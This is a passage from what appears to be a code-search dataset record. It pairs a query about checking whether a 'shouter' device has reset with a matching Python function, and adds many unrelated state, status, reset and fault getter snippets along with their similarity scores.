"def status(self):\n str = \"%s\\n\\tpv %s\\n\" % (self.name,self.pvname)\n str += \"\\tcurrent position (user,dial): %f,%f\\n\" % (self.wm(),self.wm_dial())\n str += \"\\tuser limits (low,high) : %f,%f\\n\" % (self.get_lowlim(),self.get_hilim())\n try:\n str += \"\\tpreset position : %s\" % (self.presets.state())\n except AttributeError:\n pass\n return str",
"def getState():\n # TODO: this isn't nearly as meaningful as it used to be",
"def print_state():\n global simulator\n if simulator is None:\n print \"program is not started\"\n return\n print simulator.state()",
"def print_state(self):\n\t\tprint self.time, len(self.state['s']), len(self.state['p']), len(self.state['c'])",
"def show_state(self):\n print \"I don't know how to show_state.\"",
"def silly(self) -> str:\n print(f\"Getting {self._name}'s State\")\n return self._state",
"def operational_state(self) -> str:\n return self._operational_state",
"def __str__(self):\n state_1 = \"Time: \" + str(self._time)\n state_2 = \"Current Cookies: \" + str(self._current_cookies)\n state_3 = \"CPS: \" + str(self._cps)\n state_4 = \"Total Cookies: \" + str(self._total_cookies)\n return state_1 + \" \" + state_2 + \" \" + state_3 + \" \" + state_4",
"def state(self) -> str | None:\n return self._state",
"def show_state(self):\n print(\"I don't know how to show_state.\")",
"def state_message(self) -> str:\n return pulumi.get(self, \"state_message\")",
"def state(self):\n msg = f\"Procs: {self.running_procs} / {self.procs_no}\"\n if self.gpus:\n msg += f\" | {len(self.gpus):d} GPUS:\"\n for gpu in self.gpus:\n msg += f\" {gpu}:{self.gpu_running_procs[gpu]}/{self.per_gpu[gpu]};\"\n return msg",
"def state_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state_message\")",
"def __getstate__(self):\n return '1.0', self.__dict__",
"def _get_state(self):\n print(\"GET STATE\")\n res = self._send_command(\n \"RS;\",\n fb_required=True,\n res_pattern=\"STATE:\")\n # The received answer is supposed to be something like\n # STATE:0|1|-1\n state = int(res.split(':')[1])\n if state == PVDriver.IDLE:\n return \"IDLE\"\n elif state == PVDriver.MOVING:\n return \"MOVING\"\n else:\n return \"ERROR\"",
"def __str__(self):\n return ''.join(str(e) + ' ' for e in self.state)",
"def showOperState(self):\n \n deviceName = self.deviceName()\n\n if deviceName:\n state = a.sys.net.lnx.device.DeviceUtils.getOperState(self.name, self._log, deviceName) \n print \"operstate: %s\" % state",
"def state(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"state\")",
"def detail_state(self) -> str:\n if isinstance(self.wemo, CoffeeMaker):\n return self.wemo.mode_string\n if isinstance(self.wemo, Insight):\n standby_state = self.wemo.standby_state\n if standby_state == StandbyState.ON:\n return STATE_ON\n if standby_state == StandbyState.OFF:\n return STATE_OFF\n if standby_state == StandbyState.STANDBY:\n return STATE_STANDBY\n return STATE_UNKNOWN\n # Unreachable code statement.\n raise RuntimeError",
"def state(self):\n # type: () -> string_types\n return self._state",
"def info(self):\n\n if self.running:\n return INFO_RUNNING_FORMAT.format(**self.__dict__)\n else:\n return INFO_ENDED_FORMAT.format(**self.__dict__)",
"def __repr__( self ):\n\n return self.__class__.__name__ + \"( \" + repr(self.state) + \")\";",
"def session_state():\n\n return state.summary()",
"def __repr__(self):\n string = \"Current state: \\n\"\n if self.state[0] == 0: # We're on the left side\n string += \"M: \"\n string += str(self.state[1]).ljust(10)\n string += \"M: \"\n string += str(TOTAL_NO_MISSIONARIES - self.state[1]).ljust(10)\n string += \"\\n\"\n\n string += \"C: \"\n string += str(self.state[2]).ljust(10)\n string += \"C: \"\n string += str(TOTAL_NO_CANNIBALS - self.state[2]).ljust(10)\n string += \"\\n\"\n\n string += \"Boat position: left\\n\"\n else: # We're on the right side\n string += \"M: \"\n string += str(TOTAL_NO_MISSIONARIES - self.state[1]).ljust(10)\n string += \"M: \"\n string += str(self.state[1])\n string += \"\\n\"\n\n string += \"C: \"\n string += str(TOTAL_NO_CANNIBALS - self.state[2]).ljust(10)\n string += \"C: \"\n string += str(self.state[2]).ljust(10)\n string += \"\\n\"\n\n string += \"Boat position: right\\n\"\n string += \"\\n\"\n return string",
"def print_state(self):\n print(self.identifier, \n self.gender, \n self.age,\n self.sexual_activity,\n self.disease_status,\n self.time_since_infection,\n self.number_of_partners,\n self.current_partners)",
"def state(self):\n return self.get_state()",
"def log_state(self):\n rospy.loginfo(\"STATE: %s [%s]\" %(self.__class__.__name__, 15 - self.ros_node.get_time()))",
"def getState(self):\r\n return self._get_SS_State()#self.currentState\r",
"def status(self):\n return self.state",
"def current_protection_state(self) -> str:\n return pulumi.get(self, \"current_protection_state\")",
"def get_state(self):\n pass",
"def requested_state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"requested_state\")",
"def state(self):\n return self.device.status(station=self.station_number)",
"def display_status(self) -> str:\n return pulumi.get(self, \"display_status\")",
"def current_state_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"current_state_time\")",
"def state(self):\n if self._state is None:\n return None\n\n if self._sensor_type in [ATTR_CYCLE1_START, ATTR_CYCLE2_START, ATTR_TIME]:\n if self._state[0] == 255:\n return \"Disabled\"\n return '{:02d}:{:02d}'.format(self._state[0], self._state[1])\n elif self._sensor_type == ATTR_STATUS:\n return STATUS_CHOICES[self._state]\n\n return self._state",
"def state(self):\n return self.status",
"def _get_status(self):\n return u'%s' % (self.get_status_display())",
"def resource_state(self) -> str:\n return pulumi.get(self, \"resource_state\")",
"def state(self) -> str | None:\n if self.zone.Power is True:\n state = self.coordinator.data.nowplaying[self.zone.SourceID].Status\n return STATUS_TO_STATES.get(state, None)\n else:\n return STATE_OFF",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")"
] | [
"0.79885036",
"0.77594405",
"0.76912963",
"0.7673117",
"0.76422006",
"0.76213574",
"0.7592605",
"0.7404585",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73284906",
"0.73284906",
"0.73284906",
"0.73284906",
"0.73284906",
"0.73095953",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72716844",
"0.7234093",
"0.719929",
"0.71208906",
"0.706895",
"0.7052641",
"0.70114344",
"0.6941551",
"0.69251025",
"0.69215804",
"0.6919349",
"0.68955946",
"0.68886435",
"0.6886171",
"0.68823016",
"0.68429923",
"0.68408954",
"0.6809643",
"0.68043184",
"0.680315",
"0.6785486",
"0.6779382",
"0.67677957",
"0.6729553",
"0.66983396",
"0.66918117",
"0.66549003",
"0.66514957",
"0.6645293",
"0.66220194",
"0.6609983",
"0.66010356",
"0.6587418",
"0.65827173",
"0.6573655",
"0.6568117",
"0.6564478",
"0.6560334",
"0.65509045",
"0.6529239",
"0.6519025",
"0.6513824",
"0.6509992",
"0.6507847",
"0.6498126",
"0.64955777",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254"
] | 0.0 | -1 |
This will ask whether the shouter has reset. | def get_is_reset(self, timeout = 0):
response = self.send_command_to_shouter(BP_TOOL.IS_RESET)
if response == BP_TOOL.ACK:
return False
elif response == BP_TOOL.IS_RESET:
return True
else:
return False | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def reset():\n return True",
"def hasReset(self, p_int): # real signature unknown; restored from __doc__\n return False",
"def is_reset(self):\n return self._tag == 'reset'",
"def reset(self):\n\n return bool(APIConsumer.post(\"/reset\"))",
"def _allow_reset(self):\r\n return (self.child_state == self.DONE and self.child_attempts < self.max_attempts)",
"def _verify_agent_reset(self):\n if self._ia_client is None:\n return\n\n state = self._ia_client.get_agent_state()\n if state != ResourceAgentState.UNINITIALIZED:\n cmd = AgentCommand(command=ResourceAgentEvent.RESET)\n retval = self._ia_client.execute_agent(cmd)",
"def reset():\n pass",
"def reset():\n pass",
"def should_reset(self, current_time_step: ts.TimeStep) -> bool:\n handle_auto_reset = getattr(self, '_handle_auto_reset', False)\n return handle_auto_reset and np.all(current_time_step.is_last())",
"def check_allow_reset(self):\r\n if not self.ready_to_reset:\r\n if self.current_task_number > 0:\r\n last_response_data = self.get_last_response(self.current_task_number - 1)\r\n current_response_data = self.get_current_attributes(self.current_task_number)\r\n\r\n if (current_response_data['min_score_to_attempt'] > last_response_data['score']\r\n or current_response_data['max_score_to_attempt'] < last_response_data['score']):\r\n self.state = self.DONE\r\n self.ready_to_reset = True\r\n\r\n return self.ready_to_reset",
"def reset(self, system):\r\n self.change_state(self.INITIAL)\r\n return {'success': True}",
"def reset(self):\n self.stuck = False",
"def reset():\r\n pass",
"def hard_reset() -> NoReturn:",
"def reset(self):\n return self._reset",
"def reset(self):\n return self._reset",
"def soft_reset():",
"def reset_if_ready(self):\n ready = self.ready\n if ready:\n self.reset()\n return ready",
"def test_reset_computer(self):\n computer1 = computer.Computer(1)\n computer1.reset_computer()\n res = computer1.greediness == 7 and computer1.rolls == 0\n self.assertTrue(res)",
"def reset():",
"def reset():",
"def reset():",
"def _handle_reset(self):\n # reset own state\n self.grbl_version = None\n self.in_check_mode = False\n self.line_active = False\n # wait for init\n self._wait_for_grbl_init()",
"def reset(self):\n try:\n self.bus.open(self.BUS_NUMBER)\n self.write(AntennaDeployerCommand.SYSTEM_RESET, 0x00)\n self.bus.close()\n return True\n except:\n return False",
"def on_reset(self):\n pass",
"def should_show_reset_button(self):\r\n is_survey_question = (self.max_attempts == 0)\r\n\r\n if self.rerandomize in [\"always\", \"onreset\"]:\r\n\r\n # If the problem is closed (and not a survey question with max_attempts==0),\r\n # then do NOT show the reset button.\r\n # If the problem hasn't been submitted yet, then do NOT show\r\n # the reset button.\r\n if (self.closed() and not is_survey_question) or not self.is_submitted():\r\n return False\r\n else:\r\n return True\r\n # Only randomized problems need a \"reset\" button\r\n else:\r\n return False",
"def reset(self):\n# \n self.end_and_close()\n# self.sim.start()\n\n # Start the next simulation\n self.sim._model.swmm_open()\n self.sim._model.swmm_start()\n\n # get the state\n state = self._state()\n return state",
"def reset(self, p_int): # real signature unknown; restored from __doc__\n return False",
"def reset() -> None:\n ...",
"def is_ObsReset_allowed(self):\n handler = self.get_command_object(\"ObsReset\")\n return handler.check_allowed()",
"def test_reset(self, scml_system):\n scml_system._t = 12\n scml_system._k = 33\n state_space = scml_system.state_space\n state_positions = scml_system.state_positions\n initial_state = scml_system.reset()\n target = np.array([0, 0, 0, 0, 0, 0, 560]) / scml_system.limits\n assert np.all(initial_state == target), 'Initial states of the system are incorrect'\n assert scml_system._t == 0, 'Time of the system was not set to zero after reset'\n assert scml_system._k == 0, 'Episode step of the system was not set to zero after reset'\n assert scml_system.converter.reset_counter == scml_system.electrical_motor.reset_counter \\\n == scml_system.mechanical_load.reset_counter == scml_system.supply.reset_counter,\\\n 'The reset was not passed to all components of the SCMLSystem'\n assert scml_system._ode_solver.t == 0, 'The ode solver was not reset correctly'\n assert all(scml_system._ode_solver.y == np.zeros_like(\n scml_system.mechanical_load.state_names + scml_system.electrical_motor.CURRENTS, dtype=float\n )), ' The ode solver was not reset correctly'",
"def is_reset_task_states(self, task_state):\r\n return all(self.is_initial_child_state(child) for child in task_state)",
"def reset_state():\n return {'seer_info':[],\n 's_found_w_prev_night':False}",
"def soft_reset() -> None:\n ...",
"def _doReset(self):\n self._cmdReset()",
"def clean_reset(self):\n return self._jadeRpc('debug_clean_reset')",
"def _onReset(self):\n\n self.checked['idx'] = None\n self.accepted = True\n self.close()",
"def on_reset_button(self, event):\n text = _(u\"Reset button pressed.\")\n if self.state == 0:\n self.canvas_2d.render(text)\n else:\n self.canvas_3d.render()\n\n dialog_box = MyDialog_monitor(\n self, -1, _(u\"Select signals to monitor\"), self.names, self.devices, self.monitors)\n dialog_box.Destroy()\n\n global hold_monitor\n differential = hold_monitor\n\n hold_monitor = dict.fromkeys(hold_monitor, False)\n\n dialog_box = MyDialog_monitor(\n self, -1, _(u\"Select signals to monitor\"), self.names, self.devices, self.monitors)\n\n hold_monitor = differential\n dialog_box.ok_button(wx.EVT_BUTTON)\n\n dialog_box.Destroy()\n hold_monitor = dict.fromkeys(hold_monitor, False)\n if self.state == 0:\n self.canvas_2d.Refresh()\n else:\n self.canvas_3d.Refresh()\n global global_cycles_completed\n global_cycles_completed = 0",
"def reset() -> None:\n\t_flag.clear()",
"def reset(self):\n raise AssertionError(\"Reset function not implemented\")",
"def should_reset(self):\n # type: () -> bool\n if not self._is_cache_enabled():\n return False\n elapsed = time.time() - self._last_ts\n return elapsed > self._refresh_interval_sec",
"def fueling_reset(self):\n pos.select_dispenser(1)\n crindsim.swipe_card()\n if system.wait_for(lambda: \"debit\" in crindsim.get_display_text().lower(), verify = False):\n crindsim.press_softkey(\"no\")\n if system.wait_for(lambda: \"zip\" in crindsim.get_display_text().lower(), verify = False):\n crindsim.press_keypad(\"2\")\n crindsim.press_keypad(\"7\")\n crindsim.press_keypad(\"4\")\n crindsim.press_keypad(\"1\")\n crindsim.press_keypad(\"0\")\n crindsim.press_keypad(\"enter\")\n if system.wait_for(lambda: \"carwash\" in crindsim.get_display_text().lower(), verify = False):\n crindsim.press_softkey(\"no\")\n crindsim.lift_handle()\n crindsim.open_nozzle()\n pos.click(\"reset\")\n pos.click(\"yes\")\n crindsim.close_nozzle()\n crindsim.lower_handle()\n #Checks crind diag to see if reset message is displayed\n if not system.wait_for(lambda: \"reset\" in pos.read_dispenser_diag()[\"Status\"].lower(), verify = False):\n tc_fail(\"CRIND did not reset\")\n #Wait for crind to return to idle\n if not system.wait_for(lambda: \"idle\" in pos.read_dispenser_diag()[\"Status\"].lower(), timeout = 120, verify = False):\n tc_fail(\"CRIND did not return to idle\")\n pos.click(\"back\")",
"def test_reset():\n dev = _aws_device(wires=2)\n dev._circuit = CIRCUIT\n dev._task = TASK\n\n dev.reset()\n assert dev.circuit is None\n assert dev.task is None",
"def handle_warm_resets():\n\n # If we're in USB reset, we're actively receiving warm reset signaling; and we should reset\n # to the Rx.Detect.Reset state.\n with m.If(self.in_usb_reset):\n transition_to_state(\"Rx.Detect.Reset\")",
"def reset(self):\n self.success = False\n self.i = 0\n if self.monitor:\n self.env = gym.wrappers.Monitor(self.env, \"./mountaincar-monitor\", force=True)\n state = self.env.reset()\n state = self.preprocess_state(state)\n state = np.concatenate([state] * self.action_repeat)\n return state",
"def reset(self):\n self._do_exit.clear()",
"def test_reset(self):\n p1 = self.player()\n p1.reset()\n self.assertEqual(p1.history, [])\n self.assertEqual(p1.genome[0], C)",
"def sys_reset(self):\n result = self._lib.NRFJPROG_sys_reset()\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def reset(self):\n self.clock.reset()\n self.microgrid.reset();\n self.steps_beyond_done = None\n self.updateState();\n return self.state",
"def is_restarting(self) -> bool:\r\n return False",
"def reset(self):\r\n return self._api.reset()",
"async def send_reset(self):\n try:\n await self._send_command([PrivateConstants.SYSTEM_RESET])\n except RuntimeError:\n exit(0) #keep this??",
"def _reset(self):",
"def reset(self):\n while not self._check_episode_start_condition():\n self._simulate()\n self.state, _ = self._extract_state()\n return self.state",
"def is_onset(self):\n if self._onset:\n self._reset_onset = True\n return True\n return False",
"def hardreset(self, no_sleep=False):\n self.reset_pin.value = False\n time.sleep(0.2)\n self.reset_pin.value = True\n # wait for MicroPyton prompt\n if not no_sleep:\n self.__read_until(b'information.\\r\\n>>>', timeout=10)",
"def check_state(self):\n pass",
"def handle_reset(self):\n self.initialise()",
"def _reset(self):\n pass",
"def reset(self):\n \n pass",
"def unset_compare_state():\n global simulator\n if simulator is None:\n print \"program is not running\"\n return\n simulator.unset_compare_state()",
"def test_reset(u_boot_console):\n\n u_boot_console.run_command('reset', wait_for_prompt=False)\n assert(u_boot_console.validate_exited())",
"def _reset(self) -> None:",
"def _reset(self) -> None:",
"def check_for_macke(self):\n if self.current_roll.macke is True:\n self.continued = False\n self.score_before_end = self.total_score\n self.total_score = 0\n self.stopping_reason = \"Macke\"",
"def reset(self) -> None:\n # See section 7.2.2 of the datasheet for reset description.\n self._reset.value = True\n time.sleep(0.0001) # 100 us\n self._reset.value = False\n time.sleep(0.005) # 5 ms",
"def reset(self):\r\n _debug('simq03b_api.reset')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def test_reset_reset(self):\n check_attr(self.o, 'reset')\n self.o.reset()\n self.subtest_someAgents(self.o, 2, 10)\n _0 = self.patch_agent_reset(self.o)\n # Démarrage des patches et stockage des mocks\n _1 = [_.start() for _ in _0 ]\n self.assertEqual(sum([_.call_count for _ in _1]), 0)\n self.o.reset()\n self.assertEqual(sum([_.call_count for _ in _1]), len(_0), \"individual calls expected\")\n # Fin du patching\n # for _ in _0 : _.stop()\n hum.patch.stopall()",
"def check_if_done_and_scored(self):\r\n return (self.state == self.DONE or self.ready_to_reset) and self.is_scored",
"def reset(self):\n if self.rnn:\n self.hs = None",
"def on_reset(qutest):\n\n qutest.expect_pause()\n qutest.glb_filter(FILTER.SM)\n qutest.loc_filter(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n qutest.Continue() # note continue in lower case. is a reserved word in python\n qutest.expect(\"===RTC===> St-Init Obj=AO_Philo<2>,State=QP::QHsm::top->thinking\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=thinking\")\n qutest.expect(\"%timestamp Init===> Obj=AO_Philo<2>,State=thinking\")\n qutest.glb_filter(FILTER.SM, FILTER.AO, FILTER.UA)\n qutest.current_obj(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')",
"def _hard_reset(self):\n self._reset_specific_envs(np.ones_like(self.episodes_done))\n self._update_other_info()",
"def reset_mock():\n if not var_cache['local'].reset_mock_interface():\n raise AssertionError('reset mock server fail')",
"def reset_hands(self):\r\n\r\n self.player_rock = False\r\n self.player_paper = False\r\n self.player_scissors = False\r\n self.opp_rock = False\r\n self.opp_paper = False\r\n self.opp_scissors = False",
"def reset(self):\n while (True):\n index = self.expect([pexpect.TIMEOUT, SHELL_PROMPT], timeout=1)\n if index == 0:\n break",
"def reset(self):\n self.curr_episode += 1\n self.action_episode_memory.append([])\n self.is_game_done = False\n self.price = 1.00\n self.sendCmd(self.url,\"reset\")\n return self._get_state()",
"def reset(self):\n ...",
"def reset(self):\n ...",
"def _reset(self, reason: str=None):\n pass",
"async def forceshopreset(self, ctx:commands.Context):\r\n\r\n if not await self.IsSpecialized(ctx.guild, ctx.channel.id, SHOP_CHANNEL):\r\n await ctx.send('Cannot refresh the shops here\\nUse `add shop` to turn this channel into a shop')\r\n return\r\n\r\n await self.RefreshMerchants(ctx.guild, ctx.channel)",
"def Reset(self):\n self.prompt_str = self.prompt_ev.FirstPromptEvaluator()",
"def onReset(self):\n logger.info(\"Reset called\")\n self.mainGrid.reset()",
"def debug_reset(self):\n result = self._lib.NRFJPROG_debug_reset()\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()",
"def _reset_state(self):\n\n self.state = None\n self.use_count = 0\n\n # Guards both state and use_count\n self.cond = threading.Condition()\n\n # Incremented each time we initialise a new mount state. Aids\n # debugging.\n self.generation = 0",
"def test_reset_default(self):\n check_attr(self.o, 'reset')\n self.subtest_noAgent(self.o)\n self.assertIsNone(self.o.reset(), \"no output expected\")\n self.subtest_someAgents(self.o, 2, 10)",
"def is_ringing(self) -> bool:",
"def reset_values(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"reset_values\")",
"def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()",
"def reset(self):\n error_estop = \"\"\"\\\nE-Stop is ASSERTED. Disengage E-Stop and then reset the robot.\n\"\"\"\n error_nonfatal = \"\"\"Non-fatal Robot Error on reset.\nRobot reset cleared stopped state and robot can be enabled, but a non-fatal\nerror persists. Check diagnostics or rethink.log for more info.\n\"\"\"\n error_env = \"\"\"Failed to reset robot.\nPlease verify that the ROS_IP or ROS_HOSTNAME environment variables are set\nand resolvable. For more information please visit:\nhttp://sdk.rethinkrobotics.com/wiki/RSDK_Shell#Initialize\n\"\"\"\n is_reset = lambda: (self._state.enabled == False and\n self._state.stopped == False and\n self._state.error == False and\n self._state.estop_button == 0 and\n self._state.estop_source == 0)\n pub = rospy.Publisher('robot/set_super_reset', Empty, queue_size=10)\n\n if (self._state.stopped and\n self._state.estop_button == AssemblyState.ESTOP_BUTTON_PRESSED):\n rospy.logfatal(error_estop)\n raise IOError(errno.EREMOTEIO, \"Failed to Reset: E-Stop Engaged\")\n\n rospy.loginfo(\"Resetting robot...\")\n try:\n baxter_dataflow.wait_for(\n test=is_reset,\n timeout=3.0,\n timeout_msg=error_env,\n body=pub.publish\n )\n except OSError as e:\n if e.errno == errno.ETIMEDOUT:\n if self._state.error == True and self._state.stopped == False:\n rospy.logwarn(error_nonfatal)\n return False\n raise",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def front_is_clear(): #py:front_is_clear\n return RUR._front_is_clear_()",
"def reset(self):\n pass",
"def reset(self):\n pass",
"def resetConfirm(self):\n\n ## Check if exposure is in progress\n if self.thread.isRunning():\n QtGui.QMessageBox.warning(self, \"Exposure warning.\", \"Exposure in progress, unable to close program.\", QtGui.QMessageBox.Ok)\n return\n\n else:\n reply = QtGui.QMessageBox.question(self, 'Confirmation','Are you sure you want to reset the STA3800 controller?',\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No)\n\n if reply == QtGui.QMessageBox.Yes:\n self.reset()",
"def test_reset(get_touchmat):\n touchmat = get_touchmat\n touchmat_model = check_device_types.get_device_model(touchmat)\n\n touchmat.state({'active_pen':False, 'touch': True})\n touchmat.reset()\n time.sleep(0.5)\n # The touchmat should disconnect and then reconnect. Loop for up to 5\n # seconds checking if it's connected\n count = 0\n while not touchmat.is_device_connected():\n assert count < 10\n time.sleep(0.5)\n count += 1\n\n assert touchmat.open_count() == 0\n touchmat.open()\n\n if touchmat_model == Devices.touchmat_g2:\n assert touchmat.state() == {'active_pen': True, 'touch': True}",
"def reset(self):\n\t\tpass"
] | [
"0.7329896",
"0.7245269",
"0.71851176",
"0.654862",
"0.63327384",
"0.6316024",
"0.62982106",
"0.62982106",
"0.62176245",
"0.62159413",
"0.6165632",
"0.61545885",
"0.6149942",
"0.6145588",
"0.61453944",
"0.61453944",
"0.6144835",
"0.61187637",
"0.60972834",
"0.6062806",
"0.6062806",
"0.6062806",
"0.6044876",
"0.6039784",
"0.6022954",
"0.6015995",
"0.6006247",
"0.59770674",
"0.5962392",
"0.59592724",
"0.59502363",
"0.59339696",
"0.5892891",
"0.58887976",
"0.58720845",
"0.5865067",
"0.58580583",
"0.5848671",
"0.5825117",
"0.58097345",
"0.5808804",
"0.5808103",
"0.5798437",
"0.57512146",
"0.574927",
"0.574854",
"0.57285374",
"0.5706746",
"0.57051265",
"0.57027316",
"0.56846815",
"0.56815845",
"0.56794125",
"0.5669732",
"0.5649703",
"0.5639878",
"0.5627954",
"0.56269467",
"0.56244546",
"0.5622466",
"0.56132674",
"0.5610611",
"0.56081647",
"0.56081647",
"0.56075543",
"0.5605868",
"0.5601147",
"0.55979073",
"0.55950165",
"0.55844754",
"0.5577915",
"0.5569721",
"0.55683094",
"0.55654395",
"0.55652344",
"0.55578077",
"0.55501324",
"0.55501324",
"0.55497766",
"0.5540723",
"0.55322856",
"0.55176854",
"0.55148816",
"0.55147165",
"0.55132496",
"0.5510481",
"0.5498479",
"0.5489164",
"0.5485085",
"0.5485081",
"0.5483661",
"0.5483661",
"0.5483661",
"0.5483661",
"0.5477527",
"0.5477446",
"0.5477446",
"0.54754746",
"0.5472219",
"0.5469649"
] | 0.6855109 | 3 |
This will get the current faults on the system. | def __get_faults_list(self, faults):
r_faults = []
for x in faults:
if faults[x]['value']:
r_faults.append(faults[x]['name'])
return r_faults | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_faults_current(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_ACTIVE], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_current)",
"def faults(self):\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n faults = \" \"\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,bits = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n else:\n fault_names = {0:\"Tank Level Low\",2:\"Temperature above alarm range\",\n 4:\"RTD Fault\",5:\"Pump Fault\",7:\"Temperature below alarm range\"}\n faults = \"\"\n for i in range(0,8):\n if (bits >> i) & 1:\n if i in fault_names: faults += fault_names[i]+\", \"\n else: faults += str(i)+\", \"\n faults = faults.strip(\", \")\n if faults == \"\": faults = \"none\"\n debug(\"Faults %s\" % faults)\n return faults",
"def get_faults_latched(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_LATCHED], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_latched)",
"def fault_counters(self):\n done, data = self._request('GF')\n if done:\n return {\n 'GFI self test': int(data[0], 16),\n 'Ground': int(data[1], 16),\n 'Stuck relay': int(data[2], 16)\n }\n\n raise EvseError",
"def _extend_fault_map(self):\n faults.FAULT_MAP.update({nsx_lib_exc.ManagerError:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.ServiceClusterUnavailable:\n webob.exc.HTTPServiceUnavailable,\n nsx_lib_exc.ClientCertificateNotTrusted:\n webob.exc.HTTPBadRequest,\n nsx_exc.SecurityGroupMaximumCapacityReached:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.NsxLibInvalidInput:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxENSPortSecurity:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxPluginTemporaryError:\n webob.exc.HTTPServiceUnavailable\n })",
"def fault():\n return FaultCohesiveKin()",
"def get_faults_history(self, epg_dn):\n class_query = ClassQuery('faultRecord')\n class_query.propFilter = 'eq(faultRecord.affected, \"' + epg_dn + '\")'\n return self.moDir.query(class_query)",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def sys_exc_info(self, for_hidden=False):\n return self.gettopframe()._exc_info_unroll(self.space, for_hidden)",
"def fault(self):\n return (self.status == self.STATUS_FAULT)",
"def fault_code(self):\n from numpy import nan\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n fault_code = nan\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,fault_code = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n fault_code = nan\n if fault_code == 2.0**7:\n fault_code = 8\n elif fault_code == 2.0**6:\n fault_code = 7\n elif fault_code == 2.0**5:\n fault_code = 6\n elif fault_code == 2.0**4:\n fault_code = 5\n elif fault_code == 2.0**3:\n fault_code = 4\n elif fault_code == 2.0**2:\n fault_code = 3\n elif fault_code == 2.0**1:\n fault_code = 2\n elif fault_code == 2.0**0:\n fault_code = 1\n elif fault_code == 0:\n fault_code = 0\n else:\n fault_code = -1\n debug(\"Fault code %s\" % fault_code)\n return fault_code",
